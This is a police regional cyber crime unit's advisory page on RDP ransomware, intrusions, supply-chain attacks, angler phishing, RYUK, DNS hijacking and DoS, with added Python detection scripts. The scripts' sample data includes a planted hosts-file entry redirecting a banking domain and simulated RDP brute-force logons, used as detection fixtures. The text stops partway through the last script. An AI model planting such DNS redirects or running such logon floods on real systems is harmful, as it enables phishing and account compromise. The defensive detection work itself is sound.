Current News

  • CYBER INTELLIGENCE REPORT

    CYBER INTELLIGENCE REPORT

    Welcome to the 'almost Easter' edition of the Cyber Intelligence Report! Here we'll be taking a look at how Emotet and Trickbot malware were used to spread ransomware, details of an ongoing proactive operation involving South West organisations, and we're holding our first ever South West CiSP meet up. Finally, as always, we share some more general online resources from social media and highlights from the Cyber Information Sharing Partnership (CiSP).

    We'd also be remiss not to mention that cyber attacks often occur over holiday periods to maximise the impact, so be extra careful and stay vigilant!

     

    Current Operation

    • Attention: We're currently working with businesses throughout the South West who may have suffered a form of ransomware attack because of vulnerabilities in their Remote Desktop Protocol (RDP) configuration.
    • We are actively contacting businesses as part of this operation. If you do receive a call, you can verify our identity by then calling the non-emergency police number 101, and quoting a collar number which we will supply to you for them to put you through.
    • RDP is designed to provide remote access through port 3389. Please consider the points below in relation to RDP:
    • Please ensure that you have strong usernames and passwords, and that your staff are aware of why this is important.
    • Implementing Two-Factor Authentication (especially for Office365) is also strongly recommended.
    • Be aware of who actually has access to RDP within your organisation, and always be suspicious of any spurious activity regarding RDP.

    Remember, if you or your organisation have been a victim of this or any other type of cyber crime, report to Action Fraud, the UK's national cyber crime reporting centre, at https://www.actionfraud.police.uk/ or via phone on 0300 123 2040.

  • NETWORK INTRUSIONS

    Network Intrusion


    A network intrusion is any unauthorised activity on a computer network.

    Network intrusions can be incredibly damaging, and can impact organisations in a number of ways. These can include:

    - Further spreading of malicious software (malware) e.g. ransomware
    - Data breaches
    - Secondary crimes if customers are affected such as fraud
    - Physical and environmental damage if critical national infrastructure is involved

    Attackers use various methods to compromise networks. For example, phishing emails delivering malware are a very common way for attackers to gain access to networks.

    Accounts with weak passwords and outdated software are also easy ways in for attackers, as shown in one of our investigations involving a South West based retailer. The retailer hadn't patched their Magento ecommerce platform for 6 months, and coupled with an old admin account which had lain dormant for 2 years with a weak password, these vulnerabilities allowed attackers to compromise the company's web payment pages and fraudulently obtain credit card details entered by customers.

    Intrusions can be especially sinister, as an attacker can lie dormant for months or even years gathering information on a company's infrastructure before launching further attacks.

    ADVICE

    Educate and train staff to defend against Phishing attacks
    For advice on how to spot and defend against phishing, see the NCSC's guide on this at https://www.ncsc.gov.uk/phishing

    Use Multi-Factor Authentication (MFA)
    MFA should be a high priority for any and all organisations. MFA is an additional layer of defence to stop attackers from gaining access to accounts. MFA means that access is only granted after successfully presenting more than one piece of evidence that you are who you say you are. These pieces of evidence include one-time codes from authenticator apps, or biometrics.

    MFA is fantastic for defending against Brute Force attacks, where attackers repeatedly trial and error huge numbers of possible passwords.

    Use strong and separate passwords
    Secure your website login account with a strong password, and do not reuse that password across different accounts. A strong password combines random words into a long phrase (e.g. 'ThreeRandomWords') - you can also misspell words or substitute symbols/numbers to strengthen a password (e.g. 'Thre1!Rando3!word5!')

    Ensure that your firewalls are switched on
    Most popular operating systems now include a firewall, so make sure it's switched on.

    Install, enable and update anti-virus/anti-malware
    All devices that can run it should have anti-malware/anti-virus software in place, including mobiles, tablets, routers and anything else that interacts with your corporate networks.

    Updates and patching
    As a minimum, organisations need to ensure that ALL devices and software are always fully patched. This should extend to third party solutions.

    Principle of Least Privilege
    For network intrusions this applies mostly to administrators, but it's good advice that applies to all areas of your business. This principle states that people should only have the absolute minimum access that they need to do their role, and nothing more. If done right, this can prevent or minimise the damage an attacker can do if accounts are compromised or if certain people are socially engineered.

    Reduce your attack surface
    As a rule, if you don't need something, then disable or remove it. The fewer devices/pieces of software/accounts you have, then the fewer vulnerabilities you have.

    For further advice on securing your organisation, check out the recently refurbished NCSC website at https://www.ncsc.gov.uk/

    Reporting
    If you've been affected by this or any other type of cyber crime, report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk). Always keep an eye out for any suspicious follow up activity as well.

  • ISLAND HOPPING

    ISLAND HOPPING

    Attackers will look to infiltrate target organisations through smaller companies that work with the target. The term refers to a military tactic where smaller entities are captured and leveraged in order to get to an original target.

    Island Hopping is effectively a Supply Chain attack. Attackers are banking on the assumption that smaller companies will be easier to compromise, and from there they can take advantage of any shared systems and/or the trust between organisations.

     

    ADVICE

    Understand the security risks involved with your supply chain
    Build a picture of who your suppliers are and what their security looks like. Do you know what needs to be protected and why?

    Raise awareness of security with your supply chain
    Communicate your needs to your suppliers, build it into your contracting processes, and meet your own security responsibilities both as a consumer and supplier. For example, the government backed Cyber Essentials scheme can be an indicator that companies have a commitment to cyber security, and have taken steps to guard themselves against the most common cyber threats. Details about the scheme can be found at https://www.cyberessentials.ncsc.gov.uk/

    Seek continuous improvement of security within your supply chain, and build trust with your suppliers

    Educate and train staff to defend against Phishing attacks
    For advice on how to spot and defend against phishing, see the NCSC's guide on this at https://www.ncsc.gov.uk/phishing

    The Take Five campaign is a national campaign encouraging people to stop and think about whether a situation is genuine. Visit the website at
    https://takefive-stopfraud.org.uk/advice/

    Device security
    As a minimum, organisations need to ensure that devices are always fully patched and have anti-malware/anti-virus software in place. This should apply to ALL of your devices, including phones/tablets/printers/routers/internet enabled cameras/IoT devices etc.

    Reporting
    If you've been affected by this or any other type of cyber crime, report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk). Always keep an eye out for any suspicious follow up activity as well.

  • A NEW TWIST ON 'SPOOFING'

    A NEW TWIST ON 'SPOOFING'

    Industry: Various
    Attack Methodology: Spoofing a business' identity to conduct cyber attacks
    Apparent Objective: Anonymity for criminal activity

    One complexity of cyber crime is that it isn't always clear whether a device carrying out an attack is doing so at the request of its owner, or whether it has been compromised by a malicious actor.

    In this investigation, initially undertaken by the SWRCCU, it was reported that multiple cyber attacks against various companies in the UK and abroad were originating from a computer network associated with a UK company.

    The reality was in fact different. The UK company was not the attacker, but instead a victim of something different.

    What happened?
    Criminals often compromise other computers and use them to carry out attacks, and they even offer access to these computers to other malicious actors. Here, the initial investigation identified victims whose own networks had not conducted the attacks at all; instead, entire IP ranges had been registered using their business details, such as their name and address, and it was those IP ranges that actually carried out the variety of attacks being reported.

    This was done by criminal actors with the intent to obscure their identity.

    A closer look
    The actors had set up fake websites posing as the UK victim companies, as well as mail servers which they could use to launch attacks. These fake websites were found to be associated with each other, and enquiries were conducted into that association.

    A review of a suspect controlled server was carried out. This provided important lines of enquiry:

    - Thousands of emails, the majority of which were third party companies emailing the attackers to inform them of port scanning and repeated SSH logon attempts. Essentially, other companies had seen that IP addresses registered to these businesses had been attacking them, and were asking them to stop.

    - A review of emails showed that the controller of the server had used associated accounts to register other IP ranges to conduct attacks, and also to register accounts with Bitcoin exchanges. These Bitcoin exchanges would likely be used to launder money or request ransom demands (most likely from ransomware attacks).

    It was strongly suspected that these IP ranges were being set up with the intention of then selling these to other organised criminal groups to conduct cyber-attacks. The case has since been passed on to other law enforcement agencies to further investigate.

    Points to consider
    From an advice point of view this is a difficult case to offer protective guidance for. What matters more is being aware of how your company's identity can be misused in attacks, and of how criminal infrastructure is built in general.

    PR management - One area which companies do not often prepare for is how they will handle security incidents from a PR perspective. This aspect should factor into your incident response plans, and should cover as many eventualities as possible. One of the companies whose details had been used to register IP ranges had directly received enquiries around the malicious activities. Although no public accusations or media coverage had occurred, they decided to pre-empt further enquiries by sending out a message supplied by us on their official website, outlining how the attacks were nothing to do with them.

    Malicious actors are constantly finding new methods to enact cyber crime. It's vital that your organisation is similarly always working to improve your own cyber security.

    User Education and Awareness

    If you ask the majority of cyber security professionals what they consider to be the most important aspect that an organisation needs to focus on to secure themselves, chances are 'User Education and Awareness' will be high on the list of many.

    Many organisations may be confused as to what User Education and Awareness should actually cover. Below are some guidelines on how to enable users to keep an organisation secure, whilst also allowing them to carry out their day-to-day activities.

    First of all, we'll take a look at some of the risks of not having sufficient education and awareness policies and procedures in place. Then, we'll outline how those risks can be mitigated.

     

    WHAT ARE THE RISKS?

    Removable media and personally owned devices
    Without clearly defined policies on the use of removable media and personally owned devices, staff may connect devices to corporate networks that might lead to malware infection and/or compromise of sensitive information.

    Legal and regulatory sanction
    If users aren't supported in how they handle particular classes of sensitive information, your organisation may be subject to legal and regulatory sanction.

    Incident reporting culture
    Without an effective reporting culture there will be poor dialogue between users and those responsible for security. This could result in security incidents which could easily have been prevented.

    Security Operating Procedures
    If security operating procedures don't allow staff to perform their duties, security can be seen as a blocker and possibly ignored entirely. Alternatively, following procedures too stringently might damage legitimate business activity.

    External attack
    Since users have legitimate system accesses and rights, they can be a primary focus for external attackers. Attacks such as phishing or social engineering attempts rely on taking advantage of legitimate user capabilities and functions.

    Insider Threat
    Changes over time in an employee's personal situation could make them vulnerable to coercion, and they may release sensitive information to others. Dissatisfied employees may try to abuse their system level privileges or coerce other employees to gain access to information or systems to which they aren't authorised. Equally, they may attempt to physically deface computer resources.

     

    HOW CAN THESE RISKS BE MANAGED?

    Produce a user security policy
    Develop a user security policy, as part of the overarching corporate security policy. Security procedures for all systems should be produced with consideration to different business roles and processes. Policies and procedures should be described in simple business-relevant terms with limited jargon.

    Establish a staff induction process
    New users (including contractors and third party users) should be made aware of their personal responsibility to comply with security policies as part of the induction process. The terms and conditions for their employment/contract should be formally acknowledged and retained to support any subsequent disciplinary action.

    Maintain user awareness of the security risks faced by the organisation
    All users should receive regular refresher training on the security risks to your organisation. Consider providing a platform for users to enquire about security risks and discuss the advice they are given.

    Support the formal assessment of security skills
    Staff in security roles should be encouraged to develop and formally validate their security skills through enrolment on recognised certification schemes. Certain roles such as system administrators/incident management teams may require specialist training.

    Monitor the effectiveness of security training
    Establish mechanisms to test how effective your security training is, and allow users the opportunity to feedback regarding the training to improve its value.

    Promote an incident reporting culture
    Your organisation should be seeking to empower staff to voice their concerns about poor security practices and security incidents to senior staff, without fear of recrimination. Training leaders should also seek to appreciate the effort by non-security staff taking time away from their day-to-day work to help protect the organisation.

  • EMAIL RECORDS EXPOSED ONLINE

    An exposed database belonging to Verifications.io contained both personal and business information, including 763 million unique email addresses.

    Check haveibeenpwned.com to see if you are affected

    For the complete story visit Wired.

    Please get in touch with Blueloop if you need any assistance

  • ANGLER PHISHING

    Angler Phishing

    Criminals create highly convincing customer service accounts on social media, monitor and intercept customer requests, and respond to them with links to fraudulent sites.

    Criminals often have alerts set up to inform them when someone posts about specific companies. They contact customers and usually assure them that the problem will be resolved quickly, and invite them to log in to fake websites designed to steal their credentials/install malware.

    Advice

    For individuals:

    Check that the account responding to you is the official account e.g. check whether account names and handles are what you would expect, and check previous posts/when the account was created.

    Do not click on suspicious links; if in doubt, consider using other official channels for support issues, e.g. websites or call centres.

    If a page you have been directed to is asking for your details, check for signs that the page is a fake. For example, look closely at the URL for misplaced hyphens, misspelt words or anything out of the ordinary. Does the website use HTTPS? You should also look closely at the language used on the page and at the layout. Again, if in doubt, search for and use the official website independently.

    For businesses:

    Response plan

    Formulate a response plan for handling angler phishing attacks. This could cover:

    Response team
    Identify who would be responsible for handling these incidents, and make sure they know how to deal with them.

    Communication
    Think about how you will communicate with victims about incidents. This needs to be quick and efficient.

    Triage
    Identify steps to protect your customer and your system while you handle the incident e.g. locking the customer's account while you contact them.

    Take down fraud accounts
    Contact service providers (e.g. Twitter) to take down fraudulent accounts and monitor their activity until accounts are closed. You can also consider using a service to help you identify potential lookalike fraud sites which customers may be directed to e.g. https://dnstwister.report/.
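    Lookalike checking of the kind dnstwister offers can also be done in-house against the domains that actually turn up in links sent to your customers. The Python below is an added example, not code from this report or from dnstwister: it folds the tricks a reader's eye glosses over (case, hyphens, digit-for-letter and "rn"-for-"m" substitutions), then flags observed domains that match the brand name after folding, contain it, or sit within two edits of it. The brand domain, the observed domains and the assumption that all share the same public suffix are constructed for the example.

```python
from typing import Dict, Optional

# Constructed data: the domain a business owns and domains seen in links sent to
# its customers. All names are invented for this example.
BRAND_DOMAIN = "example-bank.co.uk"
PUBLIC_SUFFIX = "co.uk"          # assumption: compare only the registrable label
OBSERVED_DOMAINS = [
    "example-bank.co.uk",          # the genuine domain
    "examp1e-bank.co.uk",          # digit 1 in place of l
    "exarnple-bank.co.uk",         # "rn" imitating "m"
    "examplebank.co.uk",           # hyphen dropped
    "example-bank-support.co.uk",  # brand name plus a reassuring word
    "exmaple-bank.co.uk",          # transposed letters
    "unrelated-shop.co.uk",
]

# Character sequences commonly used to imitate others in lookalike names.
HOMOGLYPHS = {"rn": "m", "vv": "w", "cl": "d", "0": "o", "1": "l", "3": "e", "5": "s"}


def registrable_label(domain: str, suffix: str = PUBLIC_SUFFIX) -> str:
    """'examp1e-bank.co.uk' -> 'examp1e-bank' (suffix assumed shared with the brand)."""
    domain = domain.lower().rstrip(".")
    return domain[:-len(suffix) - 1] if domain.endswith("." + suffix) else domain


def normalise(label: str) -> str:
    """Fold case, hyphens and homoglyph sequences so visual twins compare equal."""
    s = label.lower().replace("-", "")
    for fake, real in HOMOGLYPHS.items():
        s = s.replace(fake, real)
    return s


def levenshtein(a: str, b: str) -> int:
    """Minimum number of single-character edits turning a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(domain: str, brand: str = BRAND_DOMAIN) -> Optional[str]:
    """Why `domain` resembles `brand`, or None if it does not (or is the brand itself)."""
    if domain.lower().rstrip(".") == brand.lower():
        return None
    seen = normalise(registrable_label(domain))
    real = normalise(registrable_label(brand))
    if seen == real:
        return "homoglyph or hyphen variant of the brand name"
    if real in seen:
        return "contains the brand name with extra words"
    distance = levenshtein(seen, real)
    if distance <= 2:
        return f"within {distance} edit(s) of the brand name"
    return None


def find_lookalikes(domains, brand: str = BRAND_DOMAIN) -> Dict[str, str]:
    """Map each suspicious domain to the reason it was flagged."""
    flagged = {}
    for d in domains:
        reason = lookalike_reason(d, brand)
        if reason:
            flagged[d] = reason
    return flagged


if __name__ == "__main__":
    for domain, reason in find_lookalikes(OBSERVED_DOMAINS).items():
        print(f"{domain:32} {reason}")
```

    Anything this flags is a candidate for the takedown and customer-warning steps above, not proof of fraud on its own; the edit-distance threshold in particular should be tuned to how short the brand name is.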

    Social Media Support Guidelines
    Clearly state how your team uses social media customer support channels. Cover what you would never ask your customers to do/provide through social media.

    Reporting
    If you've been affected by this or any other type of cyber crime, report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk). Always keep an eye out for any suspicious follow up activity as well.

  • VULNERABLE WEBSITE PLUGINS

    Vulnerable Website Plugins


    Plugins are bits of code designed to give extra functions to websites. Like all software, these can have vulnerabilities which criminals can exploit.

    Plugins are a great way to add extra functionality to websites easily, as developers/designers don't have to spend time writing absolutely everything themselves. The rise of website builders such as WordPress/Shopify/Wix has meant that thousands of businesses are often using similar plugins, and so criminals can affect a large number of businesses and their customer bases if a vulnerability is exploited.

    If a website is hacked through vulnerable plugins, criminals can gain access to customer names/email addresses/passwords/other sensitive information.

    Alternatively they could use your website to attack others, making it look as though the attacks are from a legitimate source.

    Managing plugins
    If you are responsible for maintaining your website, then here are a few things to keep in mind when managing plugins:

    - Keep your plugins up to date (some plugins may not be supported and no longer have security updates, consider replacing these)
    - Choose reputable plugins from reputable sources
    - Delete any plugins you're no longer using
    - Use only plugins that you need (consider whether your website really needs certain functionalities - by reducing the number of plugins, you reduce the number of potential vulnerabilities you have)

    If you are not responsible for running your website, make sure to use a reputable hosting provider
    Make sure that whoever is hosting/running your website takes security seriously. Unfortunately, there are constant vulnerabilities being discovered, which means that you need to be confident that your website is receiving security updates. As with any other procurement, do research around a company's track record, and look to see what accreditations they have (e.g. Cyber Essentials/+ can be an indicator that they are aware of security responsibilities).

    Use strong and separate passwords
    Secure your website login account with a strong password, and do not reuse that password across different accounts. A strong password combines random words into a long phrase - you can also misspell words/substitute letters for symbols and numbers to strengthen a password. 

    Turn on two-factor authentication (2FA)
    2FA is an extra layer of protection which double checks that you are who you say you are when logging in to accounts/applications. A 2FA service will send an extra code to the device that you register it to, meaning that unless cyber criminals have access to that device in some way, they won't be able to log in to your account. If possible, use an authenticator app rather than a text-based 2FA service, as this is generally more secure and defends against SIM swapping attacks.

    Reporting
    If you've been affected by this or any other type of cyber crime, report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk). Always keep an eye out for any suspicious follow up activity as well.

  • RANSOMWARE ON THE RISE

    RYUK Ransomware

    Ransomware is malicious software that prevents users from accessing their system or files, and demands that a ransom be paid in order to regain access. The RYUK ransomware strain has been around for roughly 5 months now, and has been seen affecting South West organisations.

    Unlike some ransomware strains, RYUK is used for more targeted attacks. Typically, it functions by encrypting crucial assets and resources, with its infection and distribution carried out manually by criminals. This means that a lot of ground work is done by attackers, such as network mapping/hacking and credential collection.

    There have been similarities to the HERMES ransomware strain, which is known to contain code which will identify and delete backup files on a target network.

    RYUK is likely to be delivered via Phishing emails with malicious attachments (e.g. invoices/reports), or through insufficiently protected Remote Desktop Protocol (RDP) configurations.

    ADVICE

    • Back up your data! If you're hit by a ransomware attack, then you can restore from those backups.
    • Whether you're backing up to USB storage devices or separate drives, make sure that your backups are not connected to your internal network, or else they'll be at risk of infection as well.
    • Store your backups off-site as well as on-site, so that in the event of environmental damage (e.g. fires or floods) you'll still have backups to restore from.
    • Cloud storage is a great option which satisfies the above points and is now much more affordable.
    • Educate and train staff to defend against Phishing attacks - see the NCSC's guide on this at https://www.ncsc.gov.uk/phishing. This guidance also includes information for IT staff on configuring email filters effectively, which can counter certain types of BEC.
    • Protect your devices by ensuring that all software is frequently being patched and updated. Ransomware exploits vulnerabilities, so make sure to use the latest versions of any software you have, and apply security patches promptly.
    • Install and run Antivirus software - make sure that it's updated regularly!
    • Ensure that you have firewalls and that they have been correctly configured. If you are not responsible for this, ask your IT manager/provider to confirm this has been done.
    • Remote Desktop Protocol (RDP) allows administrators to connect remotely to computers over a network connection. If you have no need for RDP, consider disabling it. If you are using it, make sure that you:
    1. Employ strong/unique passwords (consider using the 'ThreeRandomWords' technique)
    2. Review port security (e.g. consider reassigning default ports/disable unused ports)
    3. Use a VPN and Two-Factor Authentication for remote working
    4. Make use of monitoring tools on RDP
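    The four RDP points above can be turned into something an administrator can actually run. The Python below is an added example (not tooling from the SWRCCU or Microsoft): it checks whether RDP is enabled when it is not needed, whether Network Level Authentication is required and whether the listener is still on the default port 3389, and it flags bursts of failed RDP logons (Windows Event ID 4625 with logon type 10) of the kind a monitoring tool should raise. The registry values are the ones Windows uses for the RDP listener; the `--needed` flag, the thresholds and the sample logon events are assumptions constructed for the example.

```python
import sys
from collections import defaultdict
from typing import Dict, List

# Registry locations Windows uses for the RDP listener.
TS_KEY = r"SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_TCP_KEY = TS_KEY + r"\WinStations\RDP-Tcp"
DEFAULT_RDP_PORT = 3389


def read_windows_rdp_settings() -> Dict[str, int]:
    """Read the live values on a Windows host (not used by the offline checks below)."""
    import winreg  # Windows-only module

    def value(path: str, name: str) -> int:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            return winreg.QueryValueEx(key, name)[0]

    return {
        "fDenyTSConnections": value(TS_KEY, "fDenyTSConnections"),      # 1 = RDP disabled
        "UserAuthentication": value(RDP_TCP_KEY, "UserAuthentication"),  # 1 = NLA required
        "PortNumber": value(RDP_TCP_KEY, "PortNumber"),
    }


def audit_rdp(settings: Dict[str, int], rdp_needed: bool) -> List[str]:
    """Compare a settings snapshot with the guidance; returns findings (empty = nothing to fix)."""
    findings: List[str] = []
    if settings.get("fDenyTSConnections", 1) != 0:
        return findings  # RDP is off: nothing exposed
    if not rdp_needed:
        findings.append("RDP is enabled but not needed: disable it")
    if settings.get("UserAuthentication", 0) != 1:
        findings.append("Network Level Authentication is off: unauthenticated clients reach the logon screen")
    if settings.get("PortNumber", DEFAULT_RDP_PORT) == DEFAULT_RDP_PORT:
        findings.append("RDP listens on the default port 3389: consider reassigning it "
                        "(this only avoids casual scans; still use a VPN and 2FA)")
    return findings


def rdp_failed_logon_bursts(events: List[Dict], threshold: int = 5,
                            window_seconds: int = 300) -> Dict[str, int]:
    """Sources with >= `threshold` failed RDP logons (4625, logon type 10) inside any
    `window_seconds` sliding window. Returns {source_ip: peak count in a window}."""
    times_by_ip: Dict[str, List[int]] = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625 and e["logon_type"] == 10:
            times_by_ip[e["source_ip"]].append(e["time"])
    flagged: Dict[str, int] = {}
    for ip, times in times_by_ip.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


# Constructed sample events (epoch seconds; addresses from documentation ranges):
# six failures in one minute from one source, one failure from another, one success.
BASE = 1_700_000_000
SAMPLE_EVENTS = (
    [{"time": BASE + 10 * i, "event_id": 4625, "logon_type": 10,
      "source_ip": "203.0.113.5", "user": "administrator"} for i in range(6)]
    + [{"time": BASE + 100, "event_id": 4625, "logon_type": 10,
        "source_ip": "198.51.100.7", "user": "jsmith"}]
    + [{"time": BASE + 120, "event_id": 4624, "logon_type": 10,
        "source_ip": "203.0.113.5", "user": "administrator"}]
)


if __name__ == "__main__":
    if sys.platform == "win32":
        for finding in audit_rdp(read_windows_rdp_settings(), rdp_needed="--needed" in sys.argv):
            print("FINDING:", finding)
    print("failed-logon bursts in sample events:", rdp_failed_logon_bursts(SAMPLE_EVENTS))
```

    Run it with `--needed` on hosts where RDP is a requirement; in production the event list would come from the Security log rather than the constructed sample, and a burst followed by a success from the same source (as in the sample) is exactly the pattern that should trigger an immediate investigation.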


    If you suffer a ransomware attack, do NOT pay the ransom. If you do pay, there is no guarantee that you will receive your data back. If anything, paying out means that you're likely to be targeted again. Report the crime to Action Fraud via phone on 0300 123 2040 or via the website (https://www.actionfraud.police.uk).

  • DNS HIJACKING

    DNS Hijacking

    An attack where criminals redirect users to undesired/malicious websites, usually by compromising devices or servers and changing settings.

    The Domain Name System (DNS) is essentially an internet phonebook, which allows domains (groups of devices) to locate and talk to each other so they can access resources such as web pages. Locating domains correctly is quite a convoluted process involving a lot of entities.

    In a stripped down scenario, when you type in a domain name/URL (e.g. 'www.google.com' for the website hosted by Google), your browser will ask your internet service provider where that domain is located. Your service provider doesn't have this information, so it asks other organisations who are responsible for domain records such as registrars/registries. These organisations will eventually locate the desired domain, and that domain will verify that it is in fact the correct one (i.e. "Yes that website is hosted here and belongs to us, here it is!").

    [Note: In this process, domain names are translated to numeric labels called 'IP addresses' - because computers prefer working with numbers!]

    If there's a compromise anywhere in this chain then that can be a real problem. Modified DNS settings can redirect a visitor to a malicious website belonging to an attacker. The visitor likely won't be aware that this has happened as they type the same URL in as usual, it just gets redirected in the background. The fake website could be designed to steal sensitive information or get someone to download malware.

    ADVICE

    There are a few different DNS hijacking methods to be aware of. These are discussed below, along with advice on how to protect yourself against these methods.

    Method #1

    Criminals will seek to install malware on your device which modifies the DNS settings on your computer/router. This will silently point you to rogue websites. To counter this, make sure that you:

    1. Install security patches and updates as they're released.
    2. Install and frequently update antivirus and anti-malware software.
    3. Avoid clicking on suspicious links in unsolicited emails/texts/social media messages.
    4. Don't download dodgy/untrusted applications.
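    The settings Method #1 tampers with can be checked directly. The Python below is an added example, not code from this report: it reads the resolver list from /etc/resolv.conf-style text and the static overrides from a hosts file, and flags any nameserver not on an approved list and any hosts entry that points a name somewhere other than loopback without being approved. The sample file contents, the approved nameservers and the approved hosts entries are all constructed for the example. On Windows the equivalents are the DNS servers shown by `ipconfig /all` and the file C:\Windows\System32\drivers\etc\hosts; the router's own DNS setting (Method #2) has to be compared against the same approved list in the router's admin interface.

```python
import ipaddress
from typing import List, Set, Tuple

# Constructed resolver configuration as it might appear in /etc/resolv.conf on a
# Linux workstation. One entry is an address the organisation does not recognise.
SAMPLE_RESOLV_CONF = """# Generated by NetworkManager
search corp.example
nameserver 192.168.1.1
nameserver 203.0.113.44
options timeout:2
"""

# Constructed hosts file: the last line silently overrides DNS for a banking site.
SAMPLE_HOSTS = """127.0.0.1   localhost
::1         localhost ip6-localhost
192.168.1.20 fileserver.corp.example
203.0.113.9  www.example-bank.co.uk
"""

# Assumed baseline for this organisation: the router and an internal resolver,
# plus the static hosts entries known to be legitimate.
APPROVED_NAMESERVERS: Set[str] = {"192.168.1.1", "10.0.0.53"}
APPROVED_HOSTS_ENTRIES: Set[Tuple[str, str]] = {("192.168.1.20", "fileserver.corp.example")}


def _strip_comment(line: str) -> str:
    return line.split("#", 1)[0].strip()


def parse_nameservers(resolv_conf: str) -> List[str]:
    """Nameserver addresses in the order the resolver will try them."""
    servers = []
    for raw in resolv_conf.splitlines():
        parts = _strip_comment(raw).split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            try:
                servers.append(str(ipaddress.ip_address(parts[1])))
            except ValueError:
                continue  # not a valid address: skip it here, report it in a real audit
    return servers


def unexpected_nameservers(resolv_conf: str,
                           approved: Set[str] = APPROVED_NAMESERVERS) -> List[str]:
    """Configured resolvers that are not on the approved list."""
    return [s for s in parse_nameservers(resolv_conf) if s not in approved]


def suspicious_hosts_entries(hosts: str,
                             approved: Set[Tuple[str, str]] = APPROVED_HOSTS_ENTRIES
                             ) -> List[Tuple[str, str]]:
    """Static name-to-address overrides that are neither loopback nor approved."""
    findings = []
    for raw in hosts.splitlines():
        parts = _strip_comment(raw).split()
        if len(parts) < 2:
            continue
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        if addr.is_loopback:
            continue  # localhost-style entries are normal
        for name in parts[1:]:
            if (str(addr), name) not in approved:
                findings.append((str(addr), name))
    return findings


if __name__ == "__main__":
    print("unexpected nameservers:", unexpected_nameservers(SAMPLE_RESOLV_CONF))
    print("suspicious hosts entries:", suspicious_hosts_entries(SAMPLE_HOSTS))
```

    In a real deployment the two sample strings are replaced by the contents of the live files, and any finding is treated as a sign of the compromise described above rather than corrected in place, so that the machine can be examined for the malware that made the change.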

    Method #2

    Criminals will hack into your router and change the DNS settings:

    One way you can protect your router from being compromised is to make sure you change the default admin username and password for the device. Default factory logins are available readily online, so this is an easy way in for hackers if login info is left unchanged.

    Method #3

    As discussed in the Threat section, your internet service provider or external agency may have become compromised. If this has happened, unfortunately there isn't a whole lot you can do. However, bear in mind the following points:

    1. Be very cautious and suspicious when a site that you visit regularly is behaving strangely (e.g. new pop-ups and unusual calls to action).
    2. Review your Business Continuity and Incident Response plans, and think about how incidents such as these are factored into your plans.

    Method #4

    It's also possible that a criminal will connect to public Wi-Fi networks and masquerade as a legitimate hotspot so that they can eavesdrop on your web traffic. To defend against this, avoid using public Wi-Fi to conduct any sensitive business which requires login information. As a rule, if the Wi-Fi doesn't have a landing page discussing terms of service or similar, be suspicious.

    Every Report Matters – if you have been a victim of fraud or cyber crime, report it to Action Fraud (either online at https://www.actionfraud.police.uk/ or call 0300 123 2040).

  • DENIAL OF SERVICE DOS

    Denial of Service (DoS) attacks

    A class of attacks which are designed to render a service inaccessible to users.

    You may have heard about or even experienced DoS attacks that have been launched against websites, however this type of attack can be launched against any system e.g. industrial control systems which support critical processes. 

    A basic technical description is that an attacker will overload a server (a computer that 'serves' many types of information to other computers) with illegitimate requests for information. This then makes it impossible for that server to deal with the requests from legitimate users, and prevents devices which depend on that network from exchanging information.

    DoS attacks can range in duration and may target more than one website or service at a time. An attack becomes a Distributed Denial of Service (DDoS) attack when it comes from multiple compromised devices at once. A group of compromised devices used for this purpose is often referred to as a botnet. It's important that you secure your devices (frequent updates/not clicking on suspicious links or attachments/utilising anti-virus etc.) so that they aren't used in this way. DDoS attacks are highly prevalent due to the increasing number of connected devices.
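    The difference between a DoS and a DDoS described above shows up plainly in a web server's access log: one source sending far more than its share, versus many sources each sending a modest amount at the same moment. The Python below is an added example, not code from this report or from any product: it parses Common Log Format lines, finds the busiest ten-second window and classifies it. The log lines are constructed (documentation-range addresses), and the window size and thresholds are assumptions to be tuned to a real site's normal traffic.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

# Common Log Format: ip ident user [timestamp] "request" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (?:\d+|-)')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[Tuple[str, int, str, int]]:
    """(source_ip, epoch_seconds, request, status), or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, request, status = m.groups()
    epoch = int(datetime.strptime(ts, TS_FORMAT).timestamp())
    return ip, epoch, request, int(status)


def detect_flood(lines: List[str], window_seconds: int = 10, total_threshold: int = 60,
                 per_ip_threshold: int = 20, distinct_sources: int = 10) -> Dict:
    """Find the busiest `window_seconds` bucket and say whether it looks like a flood.
    'dos'  : a few sources each above per_ip_threshold dominate the window
    'ddos' : no single heavy source, but many distinct sources at once
    """
    buckets: Dict[int, Counter] = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ip, epoch, _, _ = parsed
            buckets[epoch // window_seconds][ip] += 1
    if not buckets:
        return {"verdict": "normal", "requests": 0, "flooders": [], "distinct_sources": 0}
    bucket_id, counts = max(buckets.items(), key=lambda kv: sum(kv[1].values()))
    total = sum(counts.values())
    flooders = sorted(ip for ip, n in counts.items() if n >= per_ip_threshold)
    if total < total_threshold:
        verdict = "normal"
    elif flooders:
        verdict = "dos"
    elif len(counts) >= distinct_sources:
        verdict = "ddos"
    else:
        verdict = "elevated"
    return {"verdict": verdict, "window_start": bucket_id * window_seconds,
            "requests": total, "flooders": flooders, "distinct_sources": len(counts)}


def synthetic_log(requests_per_ip: Dict[str, int], start_epoch: int = 1554887700) -> List[str]:
    """Constructed access-log lines: each source's requests spread over one 10-second window."""
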